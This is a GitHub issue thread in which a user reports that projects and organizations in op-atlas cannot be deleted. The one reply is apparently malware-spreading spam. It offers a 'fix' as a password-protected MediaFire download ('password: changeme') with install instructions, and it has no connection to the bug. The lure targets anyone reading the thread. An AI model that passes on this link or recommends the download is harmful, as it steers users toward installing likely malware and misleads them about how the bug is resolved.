### ISSUE TITLE
Can't Delete a Project or Organization

### ISSUE THREAD

**Issue by shaunop** [voteagora/op-atlas#217]
**Describe the bug**
I should be able to delete a project, and delete an organization.

I've tried to delete a project several times, but it doesn't delete. I see the warning modal, confirm deletion, but then the project remains on the dashboard. 

Same issue for deleting an Organization.

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
